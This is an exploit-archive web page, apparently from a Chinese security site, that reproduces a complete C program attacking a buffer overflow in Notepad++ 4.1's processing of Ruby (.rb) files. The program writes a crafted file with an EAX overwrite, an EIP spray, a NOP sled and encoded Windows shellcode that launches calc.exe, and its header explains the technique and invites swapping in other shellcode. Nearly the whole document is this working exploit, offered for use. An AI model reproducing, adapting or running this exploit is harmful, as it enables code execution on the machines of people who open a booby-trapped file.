首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
notepad++ 4.1 ruby file processing Buffer Overflow Exploit (win32)
来源:v9@fakehalo.us 作者:vade79 发布时间:2007-05-14  
/*[ notepad++[v4.1]: (win32) ruby file processing buffer overflow exploit. ]*
  *                                                                         *
  * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)                        *
  *                                                                         *
  * compile:                                                                *
  *  gcc xnotepad++.c -o xnotepad++                                         *
  *                                                                         *
  * syntax:                                                                 *
  *  ./xnotepad++ [-xe] -f filename                                         *
  *                                                                         *
  * notepad++ homepage/url:                                                 *
  *  http://sourceforge.net/projects/notepad-plus/                          *
  *  http://notepad-plus.sourceforge.net/                                   *
  *                                                                         *
  * notepad++ contains a buffer overflow vulnerability in the way it        *
  * processes ruby source files (.rb).  this exploit works by overwriting   *
  * EAX which gets called during processing as "CALL DWORD EAX+4", so EAX   *
  * needs to point to a user-controlled area that contains another address  *
  * which will then become EIP.  once EIP is controlled it simply jumps a   *
  * little bit forward in memory to the nop sled/shellcode.                 *
  *                                                                         *
  * as of now, this will only be successful if the created file is opened   *
  * via "Edit with notepad++" on the file, not when opening a file from     *
  * inside notepad++.  this is mainly to prove this vulnerability can be    *
  * exploited.                                                              *
  *                                                                         *
  * exploitation method(file.rb):                                           *
  *  [FILLERx32][NEW_EAX][FILLERx128]\r\n                                   *
  *  # [NEW_EIPx1000][NOPSx4000][SHELLCODE]\r\n                             *
  *                                                                         *
  * (i was a bit liberal with the new_eip/shellcode space, can pretty much  *
  * make it as large as you like.  also, addresses with null-bytes are      *
  * allowed)                                                                *
  *                                                                         *
  * if successful, notepad++ will spawn calc.exe by default, swap the       *
  * shellcode out if you want a different result.  this was tested on winXP *
  * SP2 ENG, if it is something else the EAX/EIP addresses may need to be   *
  * fished out of memory in your favorite debugger.                         *
  ***************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <getopt.h>

#define DFL_EAX 0x000fd47c /* winXP SP2 ENG */
#define DFL_EIP 0x000fe3d0 /* winXP SP2 ENG */

/* win32_exec -  EXITFUNC=thread CMD=calc.exe Size=164 */
/* Encoder=PexFnstenvSub http://metasploit.com */
static unsigned char x86_exec[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
"\x19\x25\xc7\x83\xeb\xfc\xe2\xf4\x24\xf1\x61\xc7\xd8\x19\xae\x82"
"\xe4\x92\x59\xc2\xa0\x18\xca\x4c\x97\x01\xae\x98\xf8\x18\xce\x8e"
"\x53\x2d\xae\xc6\x36\x28\xe5\x5e\x74\x9d\xe5\xb3\xdf\xd8\xef\xca"
"\xd9\xdb\xce\x33\xe3\x4d\x01\xc3\xad\xfc\xae\x98\xfc\x18\xce\xa1"
"\x53\x15\x6e\x4c\x87\x05\x24\x2c\x53\x05\xae\xc6\x33\x90\x79\xe3"
"\xdc\xda\x14\x07\xbc\x92\x65\xf7\x5d\xd9\x5d\xcb\x53\x59\x29\x4c"
"\xa8\x05\x88\x4c\xb0\x11\xce\xce\x53\x99\x95\xc7\xd8\x19\xae\xaf"
"\xe4\x46\x14\x31\xb8\x4f\xac\x3f\x5b\xd9\x5e\x97\xb0\xf6\xeb\x27"
"\xb8\x71\xbd\x39\x52\x17\x72\x38\x3f\x7a\x44\xab\xbb\x37\x40\xbf"
"\xbd\x19\x25\xc7";

struct{
unsigned int eax;
unsigned int eip;
char *file;
}tbl;

/* lonely extern. */
extern char *optarg;

/* functions. */
unsigned char write_rb(char *,unsigned int,unsigned int);
void printe(char *,short);
void usage(char *);

/* start. */
int main(int argc,char **argv){
signed int chr=0;
char *ptr;

printf("[*] notepad++[v4.1]: (win32) ruby file processing buffer over"
"flow exploit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
"\n\n");

tbl.eax=DFL_EAX;
tbl.eip=DFL_EIP;

while((chr=getopt(argc,argv,"f:x:e:"))!=EOF){
  switch(chr){
   case 'f':
    if(!tbl.file){
     if((ptr=rindex(optarg,'.'))&&!strcasecmp(ptr,".rb")){
      if(!(tbl.file=(char *)strdup(optarg)))
        printe("main(): allocating memory failed",1);
     }
     else{
      if(!(tbl.file=(char *)malloc(strlen(optarg)+4)))
       printe("main(): allocating memory failed",1);
      sprintf(tbl.file,"%s.rb",optarg);
     }
    }
    break;
   case 'x':
    sscanf(optarg,"%x",&tbl.eax);
    break;
   case 'e':
    sscanf(optarg,"%x",&tbl.eip);
    break;
   default:
    usage(argv[0]);
    break;
  }
}
if(!tbl.file)usage(argv[0]);

printf("[*] filename:\t\t\t%s\n",tbl.file);
printf("[*] EAX address:\t\t0x%.8x\n",tbl.eax);
printf("[*] EIP address:\t\t0x%.8x\n\n",tbl.eip);

if(write_rb(tbl.file,tbl.eax,tbl.eip))
  printe("failed to write to file.",1);
exit(0);
}

/* write the ruby file. */
unsigned char write_rb(char *file,unsigned int eax,unsigned int eip){
unsigned int i=0;
unsigned int real_eax=eax-4;
unsigned char filler='x';
unsigned char nop=0x90;
FILE *fs;
if(!(fs=fopen(file, "wb")))return(1);
for(i=0;i<32;i++){
  fwrite(&filler,1,1,fs);
}
/* EAX overwrite, "CALL DWORD EAX+4" will be processed. */
fwrite(&real_eax,4,1,fs);
for(i=0;i<128;i++){
  fwrite(&filler,1,1,fs);
}
/* from here on will be commented out, but loaded into memory. */
fwrite("\r\n# ",4,1,fs);
/* EAX overwrite will point here, and change the EIP to this. */
for(i=0;i<1000;i++){
  fwrite(&eip,4,1,fs);
}
/* EIP from above will point into this nop sled. */
for(i=0;i<4000;i++){
  fwrite(&nop,1,1,fs);
}
/* if all went well, execute away! */
fwrite(&x86_exec,sizeof(x86_exec),1,fs);
fwrite("\r\n",2,1,fs);
fclose(fs);
return(0);
}

/* error! */
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}

/* usage. */
void usage(char *progname){
printf("syntax: %s [-xe] -f filename\n\n",progname);
printf("  -f <file>\tfilename to output.\n");
printf("  -x <addr>\tEAX address, points to new EIP address in memory (0x%.8x)\n",
tbl.eax);
printf("  -e <addr>\tEIP address, points to NOPS/shellcode (0x%.8x)\n\n",tbl.eip);
exit(0);
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·McAfee Security Center IsOldAp
·webdesproxy 0.0.1 (GET Request
·MS Internet Explorer <= 7 Remo
·VImpX ActiveX (VImpX.ocx v. 4.
·TaskDriver <= 1.2 Login Bypass
·webdesproxy 0.0.1 (GET Request
·Gimp 2.2.14 .RAS File Download
·TinyIdentD <= 2.2 Remote Buffe
·Helix Server Vsrc3260.dll Remo
·Eudora 7.1 SMTP ResponseRemote
·Fenice OMS server 1.10 Remote
·MS Windows Vista forged ARP pa
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved